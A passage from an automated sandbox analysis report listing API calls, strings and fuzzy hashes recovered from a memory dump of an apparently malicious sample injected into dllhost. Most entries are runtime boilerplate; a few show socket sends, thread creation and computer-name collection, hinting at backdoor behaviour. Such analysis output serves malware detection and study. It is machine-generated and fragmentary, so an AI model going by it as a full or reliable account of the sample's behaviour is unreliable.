                      • Part of subcall function 032A2227: __getptd.LIBCMT ref: 032A2235
                      • Part of subcall function 032A2227: __getptd.LIBCMT ref: 032A2243
                    • __getptd.LIBCMT ref: 032A26A1
                      • Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
                      • Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8
                    • __getptd.LIBCMT ref: 032A26AF
                    • __getptd.LIBCMT ref: 032A26BD
                    • __getptd.LIBCMT ref: 032A26C8
                    • _CallCatchBlock2.LIBCMT ref: 032A26EE
                      • Part of subcall function 032A22CC: __CallSettingFrame@12.LIBCMT ref: 032A2318
                      • Part of subcall function 032A2795: __getptd.LIBCMT ref: 032A27A4
                      • Part of subcall function 032A2795: __getptd.LIBCMT ref: 032A27B2
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: eaf66e637999d5ae7679a19a23cba6b3d988fadf5ca8f715f33f63afdead8724
                    • Instruction ID: 5f60e55c3fadb4a6e62db8823fdd769db24e72fd0d743de5065976c3ac3553f0
                    • Opcode Fuzzy Hash: eaf66e637999d5ae7679a19a23cba6b3d988fadf5ca8f715f33f63afdead8724
                    • Instruction Fuzzy Hash: 6511EC75D10309DFDF00EFA4C844AAD77B0FF09311F51846AE814AB250DB789A559F65
                    APIs
                    • __getptd.LIBCMT ref: 0329A813
                      • Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
                      • Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8
                    • __amsg_exit.LIBCMT ref: 0329A833
                    • __lock.LIBCMT ref: 0329A843
                    • InterlockedDecrement.KERNEL32(?), ref: 0329A860
                    • _free.LIBCMT ref: 0329A873
                    • InterlockedIncrement.KERNEL32(05071680), ref: 0329A88B
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 1d145a3af1cdd005f67cf7c433afc2d68a58b301b081a75802dcbdf9c8c4d651
                    • Instruction ID: 2c5ccb3371753ebc0e80faa804cb947f3509114a815c255a220467bdf5fa774b
                    • Opcode Fuzzy Hash: 1d145a3af1cdd005f67cf7c433afc2d68a58b301b081a75802dcbdf9c8c4d651
                    • Instruction Fuzzy Hash: B201A135920B26EBFF51FB29B40875DB7A0BF04750F094586E815AB284C774A9C3CBD1
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 03291758
                      • Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 0329208B
                      • Part of subcall function 03292076: __CxxThrowException@8.LIBCMT ref: 032920A0
                      • Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 032920B1
                    • std::_Xinvalid_argument.LIBCPMT ref: 03291776
                    • std::_Xinvalid_argument.LIBCPMT ref: 03291791
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
                    • String ID: invalid string position$string too long
                    • API String ID: 4225265588-4289949731
                    • Opcode ID: e54b6263a477c57d8ec47ddd957a64d0155b6342e507cf84e54336005f5fcc7b
                    • Instruction ID: 7f7a7cabcef780559dcc5bb4d4859721f4e045402029ebdb5c76911e7a2a99d9
                    • Opcode Fuzzy Hash: e54b6263a477c57d8ec47ddd957a64d0155b6342e507cf84e54336005f5fcc7b
                    • Instruction Fuzzy Hash: BD21EB367203079FFB24DD6DEC80A6AF7E9BF91650B244A6FE4528B650D371E890C351
                    APIs
                    • _malloc.LIBCMT ref: 03292908
                      • Part of subcall function 0329364E: __FF_MSGBANNER.LIBCMT ref: 03293667
                      • Part of subcall function 0329364E: __NMSG_WRITE.LIBCMT ref: 0329366E
                      • Part of subcall function 0329364E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293), ref: 03293693
                    • std::exception::exception.LIBCMT ref: 0329293D
                    • std::exception::exception.LIBCMT ref: 03292957
                    • __CxxThrowException@8.LIBCMT ref: 03292968
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                    • String ID: bad allocation
                    • API String ID: 1414122017-2104205924
                    • Opcode ID: fab2c2dd17d5ab605e057996a1c3d1d499fd91bc9ab44d177e9318ce67f843f5
                    • Instruction ID: 39206fd23b4805596b2bd80894da8501fed3aeb00134de1b40a80475434c508e
                    • Opcode Fuzzy Hash: fab2c2dd17d5ab605e057996a1c3d1d499fd91bc9ab44d177e9318ce67f843f5
                    • Instruction Fuzzy Hash: 8CF02638630B0DFBFF14EB59ED049AD7BA8BB04704F14085AD9009A082DBF09AC18691
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 032A2A2F
                      • Part of subcall function 032A298A: ___BuildCatchObjectHelper.LIBCMT ref: 032A29C0
                    • _UnwindNestedFrames.LIBCMT ref: 032A2A46
                    • ___FrameUnwindToState.LIBCMT ref: 032A2A54
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm$csm
                    • API String ID: 2163707966-3733052814
                    • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction ID: 2c160b7f58689a43f0bbb782fdce0df43c343e66a8ac5fd31c0aa9e71e4285b7
                    • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction Fuzzy Hash: EC011235410A0AFBCF22AF58CC44EAA7E6AEF08350F144810BC1818121D77299B1DBA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID:
                    • API String ID: 4048096073-0
                    • Opcode ID: 69336d9885d9749209e554cb7181d103386cb2368780285604cb97ae0f6dc172
                    • Instruction ID: b79abfcec2f7ceef2e733f265b24e04a9c900dba489e803f0e8055990eba9929
                    • Opcode Fuzzy Hash: 69336d9885d9749209e554cb7181d103386cb2368780285604cb97ae0f6dc172
                    • Instruction Fuzzy Hash: 63518635A2030EFFFF24DF69888469EB7B5AF44320F184A6BE46556190D770A9D1CB90
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a13e65c264c8a25b4bbb2b00e94af10b967448786ad63ed762cd0686b3402581
                    • Instruction ID: be96b0b6b868798491c6e3d21c9fb907a50389b15b95efe5b76db5031ad0b89c
                    • Opcode Fuzzy Hash: a13e65c264c8a25b4bbb2b00e94af10b967448786ad63ed762cd0686b3402581
                    • Instruction Fuzzy Hash: 6331B0B1710B05AFE720DF6DDC85B6BB7A8EB89711F144159FE48CB241E7B0D8808B90
                    APIs
                    • send.WS2_32(?,?,00002000,00000000), ref: 032A6E54
                    • Sleep.KERNEL32(0000001E), ref: 032A6E62
                    • Sleep.KERNEL32(0000001E), ref: 032A6E7E
                    • send.WS2_32(?,?,00000000,00000000), ref: 032A6EB1
                    • Sleep.KERNEL32(00000064), ref: 032A6EBF
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Sleep$send
                    • String ID:
                    • API String ID: 4079979460-0
                    • Opcode ID: 6c0d97cb76e77e5f2ddba57578c2ed4315d9fdb319617bb80de6386a93d22a91
                    • Instruction ID: b9ca06a226d71a801fb5467be958d1b57bf51f352968e447cbabaf9ec6728a06
                    • Opcode Fuzzy Hash: 6c0d97cb76e77e5f2ddba57578c2ed4315d9fdb319617bb80de6386a93d22a91
                    • Instruction Fuzzy Hash: 8521C075910B18AFE720DB6DDACCF9EBBB6EB44360F284165F804DB280C77099C0C690
                    APIs
                    • _malloc.LIBCMT ref: 0329349B
                      • Part of subcall function 0329364E: __FF_MSGBANNER.LIBCMT ref: 03293667
                      • Part of subcall function 0329364E: __NMSG_WRITE.LIBCMT ref: 0329366E
                      • Part of subcall function 0329364E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293), ref: 03293693
                    • _free.LIBCMT ref: 032934AE
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AllocHeap_free_malloc
                    • String ID:
                    • API String ID: 2734353464-0
                    • Opcode ID: 88a7764cfd507f6dd6931f163f25ebfb20e81edee12a4650dee5baed330932c3
                    • Instruction ID: 774b29fa5a70d7c113d802946769373c1a18140db5015c4b6006d33d8144640a
                    • Opcode Fuzzy Hash: 88a7764cfd507f6dd6931f163f25ebfb20e81edee12a4650dee5baed330932c3
                    • Instruction Fuzzy Hash: 4111983E525B15EBFF23FA74AC0875D3B98AB49270B25842BE9499A140DBB5C8C086D0
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00000000,032A54AA,?,?,?,1D2AA39B), ref: 032A4F5F
                    • _free.LIBCMT ref: 032A4F6C
                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,032A54AA,?,?,?,1D2AA39B), ref: 032A4F83
                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,032A54AA,?,?,?,1D2AA39B), ref: 032A4F8C
                    • HeapFree.KERNEL32(00000000,?,?,?,1D2AA39B), ref: 032A4F93
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Free$Heap$LibraryProcessVirtual_free
                    • String ID:
                    • API String ID: 3953351234-0
                    • Opcode ID: cfd5605e7174f2b0b8b5c8272988264d36e92561dc4edd18c175d82b2b864a0a
                    • Instruction ID: 8d8b7d34b072377252740cf15ead1c5eb00968707ec20ab44df78ea68e471dd5
                    • Opcode Fuzzy Hash: cfd5605e7174f2b0b8b5c8272988264d36e92561dc4edd18c175d82b2b864a0a
                    • Instruction Fuzzy Hash: C3015B71610B019BC630EB2AD888E27B3E9BBC9711B148A1CE1AAC7684D775F481CB10
                    APIs
                    • __getptd.LIBCMT ref: 0329A577
                      • Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
                      • Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8
                    • __getptd.LIBCMT ref: 0329A58E
                    • __amsg_exit.LIBCMT ref: 0329A59C
                    • __lock.LIBCMT ref: 0329A5AC
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0329A5C0
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 4a4b86eac72dd5bde690ba174620dd904798e6ce4eb0656101a0c2582b08166a
                    • Instruction ID: 3ecf51e12635777c8d2c2511eb50a69c515f355bf005d88f8ba6861524ac2e4d
                    • Opcode Fuzzy Hash: 4a4b86eac72dd5bde690ba174620dd904798e6ce4eb0656101a0c2582b08166a
                    • Instruction Fuzzy Hash: 18F09A36F747119BFE61FB789806B2D73A0AF00720F65824BE516AF1C0CBE459C19B5A
                    APIs
                    • setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 032A6F12
                    • CancelIo.KERNEL32(000000FF,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F1F
                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A6F2E
                    • closesocket.WS2_32(000000FF), ref: 032A6F3B
                    • SetEvent.KERNEL32(?,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F48
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                    • String ID:
                    • API String ID: 1486965892-0
                    • Opcode ID: c06b343b279c53a3c8de4b83ab851b452b9ff2ca3956de3190772833bd62c3e3
                    • Instruction ID: 1937ebdcddd871e7b19c4386b585bf45256c40c06d789887525f61b85643648b
                    • Opcode Fuzzy Hash: c06b343b279c53a3c8de4b83ab851b452b9ff2ca3956de3190772833bd62c3e3
                    • Instruction Fuzzy Hash: E8F03671540708ABD3A0EBA5E84CFA6B7BDBB48700F108A0CF65A86284DB706444DF61
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 03291AB6
                      • Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 0329208B
                      • Part of subcall function 03292076: __CxxThrowException@8.LIBCMT ref: 032920A0
                      • Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 032920B1
                    • std::_Xinvalid_argument.LIBCPMT ref: 03291AED
                      • Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 0329203E
                      • Part of subcall function 03292029: __CxxThrowException@8.LIBCMT ref: 03292053
                      • Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 03292064
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: invalid string position$string too long
                    • API String ID: 1823113695-4289949731
                    • Opcode ID: 625b0ea93cd5e82053c169b4ead113f24de2fd98b6dfac2cd920f738e9985dd8
                    • Instruction ID: dc7086f3a0fb04c19c354c1b5480a8753fabd0afd03cb1941bdee1179aed7262
                    • Opcode Fuzzy Hash: 625b0ea93cd5e82053c169b4ead113f24de2fd98b6dfac2cd920f738e9985dd8
                    • Instruction Fuzzy Hash: 5A21EC337102118BEF21D96DE850A5AF79DDFA1660B14093FE151CB640D6B1ECD1C3A5
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 0329166A
                      • Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 0329203E
                      • Part of subcall function 03292029: __CxxThrowException@8.LIBCMT ref: 03292053
                      • Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 03292064
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: vector<T> too long$yxxx$yxxx
                    • API String ID: 1823113695-1517697755
                    • Opcode ID: 4e6be790d22e7caa79dfb9d30f07e3cc24a7d7489778cb774997274f5a9ad809
                    • Instruction ID: 9db402752a55e03d491d8a1c33ac0d7fa9239f643b9bfb5e2f7d094f2c27645d
                    • Opcode Fuzzy Hash: 4e6be790d22e7caa79dfb9d30f07e3cc24a7d7489778cb774997274f5a9ad809
                    • Instruction Fuzzy Hash: 6C21F5B2E103099FD709EF5DFC85A6AB7E9E394350F15822BD8059B384F770B940CA90
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 032914BE
                      • Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 0329203E
                      • Part of subcall function 03292029: __CxxThrowException@8.LIBCMT ref: 03292053
                      • Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 03292064
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: vector<T> too long$yxxx$yxxx
                    • API String ID: 1823113695-1517697755
                    • Opcode ID: 692f4c4b942629bb508d6948f5334f3cb8caed2f6211027b93e32143eb174e42
                    • Instruction ID: 92e48075bc63f67933adbbafd45b1db808f828ee0fc34cbd9488f27238a064f2
                    • Opcode Fuzzy Hash: 692f4c4b942629bb508d6948f5334f3cb8caed2f6211027b93e32143eb174e42
                    • Instruction Fuzzy Hash: 98F0F623B200335B8B1CA43EBC5447EA58A42E439031AD63BD813CFB89E850F8D092D0
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0329D110
                    • __isleadbyte_l.LIBCMT ref: 0329D143
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,0329B799,00000109,00BFBBEF,00000003), ref: 0329D174
                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0329B799,00000109,00BFBBEF,00000003), ref: 0329D1E2
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 20f1d7103953bd6cd356985e2147b959ec361612e03e4e48c6e1a43f875932a2
                    • Instruction ID: 3673a7290ea211e4496e47c6a3bf7b6180fe5cb5a637a879a0e59ac59c7046a4
                    • Opcode Fuzzy Hash: 20f1d7103953bd6cd356985e2147b959ec361612e03e4e48c6e1a43f875932a2
                    • Instruction Fuzzy Hash: 3831A532A20246EFFF20EF68CC849BD7BB5BF01610F1985AAE4559B190E370D9C0EB50
                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: 1e20d39ef5db10fb72c344c352c96a8792aa172f41407c940a5d686e099a9358
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: EA118C7702014AFBDF16AE88CC51CEE3F23BF19254B198816FE1859030C276C9B1BB91
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 032A571A
                    • _memset.LIBCMT ref: 032A5738
                    • _strncpy.LIBCMT ref: 032A5747
                    • GetTickCount.KERNEL32 ref: 032A5762
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CountCreateEventTick_memset_strncpy
                    • String ID:
                    • API String ID: 2595203753-0
                    • Opcode ID: 119ada5e5dd73182a173e253ac1510209ee452abd18ce1d6af4e345cff36677f
                    • Instruction ID: 6a640f41f767a649c4ea04045f15dddb4a10c130d25244b6acce519036a3f0d4
                    • Opcode Fuzzy Hash: 119ada5e5dd73182a173e253ac1510209ee452abd18ce1d6af4e345cff36677f
                    • Instruction Fuzzy Hash: 70F062B0640B05AFD730DF59D845B47FBF8AF04B00F10891EE6998B691E3B1B184CB95
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 032A3588
                    • CreateThread.KERNEL32(00000000,00000000,Function_000134E0,?,00000000,00000000), ref: 032A35A2
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 032A35B0
                    • CloseHandle.KERNEL32(?), ref: 032A35BA
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3360349984-0
                    • Opcode ID: bc5681751867714ee1efc04c92fcc63ec7dfbe6b5207903ac6f5bf016e78f791
                    • Instruction ID: 082230f58f4b8255fd9ecf55c658cb77bec8bc2d318049620f17bbe904bc86a4
                    • Opcode Fuzzy Hash: bc5681751867714ee1efc04c92fcc63ec7dfbe6b5207903ac6f5bf016e78f791
                    • Instruction Fuzzy Hash: 40F0BB75E44318BBD710EB95AC4AF9EBB78A704750F208255FA15E72C0D6B055009BD4
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 03291584
                    • std::_Xinvalid_argument.LIBCPMT ref: 0329159F
                      • Part of subcall function 03291740: std::_Xinvalid_argument.LIBCPMT ref: 03291758
                      • Part of subcall function 03291740: std::_Xinvalid_argument.LIBCPMT ref: 03291776
                      • Part of subcall function 03291740: std::_Xinvalid_argument.LIBCPMT ref: 03291791
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_
                    • String ID: string too long
                    • API String ID: 909987262-2556327735
                    • Opcode ID: f10ccdc2e9e59315c0df3174e7f379b46a4e6a7a4d4ebabe76384b4113f96a1e
                    • Instruction ID: 39510b40c4bdc27ae3e5bd36e25c4aa5a2ac2985decb16010d26f898f3443512
                    • Opcode Fuzzy Hash: f10ccdc2e9e59315c0df3174e7f379b46a4e6a7a4d4ebabe76384b4113f96a1e
                    • Instruction Fuzzy Hash: 4331F8737202129FFB24D96EE88096AF3E9DF912607254A2BE156CB740C771E8D1C3A4
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 03291A3F
                      • Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 0329208B
                      • Part of subcall function 03292076: __CxxThrowException@8.LIBCMT ref: 032920A0
                      • Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 032920B1
                    • _memmove.LIBCMT ref: 03291A75
                    Strings
                    • invalid string position, xrefs: 03291A3A
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                    • String ID: invalid string position
                    • API String ID: 1785806476-1799206989
                    • Opcode ID: 52c57e2a7812bc87599b3133c1f11fbd216c2c063f7339f8ce8a2de568138e39
                    • Instruction ID: 62fe8cd6476c026dd68d30a76fcc9332be8b8a3bbe8db82500f5fa80f62503b2
                    • Opcode Fuzzy Hash: 52c57e2a7812bc87599b3133c1f11fbd216c2c063f7339f8ce8a2de568138e39
                    • Instruction Fuzzy Hash: 400144327247028BEB25C96DEC9452AB6EA9BC1544B244D1AD095CB749D6B1ECD1C350
                    APIs
                      • Part of subcall function 032A227A: __getptd.LIBCMT ref: 032A2280
                      • Part of subcall function 032A227A: __getptd.LIBCMT ref: 032A2290
                    • __getptd.LIBCMT ref: 032A27A4
                      • Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
                      • Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8
                    • __getptd.LIBCMT ref: 032A27B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: 135634702eea3cad99a0d270f4a419fbfcd7f74b66e5f02841c9d2c338727151
                    • Instruction ID: 8c319cdb646c07ceec5cde8611de6d478598f95545854ea0a55ad4f952771739
                    • Opcode Fuzzy Hash: 135634702eea3cad99a0d270f4a419fbfcd7f74b66e5f02841c9d2c338727151
                    • Instruction Fuzzy Hash: C4012838824B06CFCF38DF29D840BACB7B9BF00311F68496AE0415A290CB7496D1CF61
                    APIs
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
                      • Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
                      • Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
